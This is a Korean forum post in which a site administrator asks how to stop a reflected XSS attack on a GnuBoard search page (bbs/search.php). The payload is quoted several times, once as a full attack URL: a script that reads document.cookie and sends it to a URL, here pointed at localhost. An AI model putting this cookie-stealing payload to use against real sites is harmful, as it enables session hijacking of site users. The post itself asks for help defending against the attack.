게시판에 아래 키워드를 입력하면..
이 키워드를 입력하면 사이트에 에러가 나버리는데요..
계속 누가 악질적으로 이짓을해서 일단 검색을 아예 빼버렷는데
"><script>alert(document.cookie);%20var%20url%20=%20'http://localhost/'+document.cookie;%20window.open(url);</script>
이걸 bbs/search.php에 날리면 그대로 먹히거든요;;
어떻게 해결하죠..ㄷㄷ
계속 누가 악질적으로 이짓을해서 일단 검색을 아예 빼버렷는데
"><script>alert(document.cookie);%20var%20url%20=%20'http://localhost/'+document.cookie;%20window.open(url);</script>
이걸 bbs/search.php에 날리면 그대로 먹히거든요;;
어떻게 해결하죠..ㄷㄷ
|
댓글을 작성하시려면 로그인이 필요합니다.
댓글 2개
예를들어
http://test.com/gnu4/bbs/search.php?"><script>alert(document.cookie);%20var%20url%20=%20'http://localhost/'+document.cookie;%20window.open(url);</script>
이런식으로요.
어떤변수에어떻게넣는지 그런게 중요할듯하네요.
검색 파일에 외부에서 변수받아오는 것은 stx 뿐인걸로 아는데요..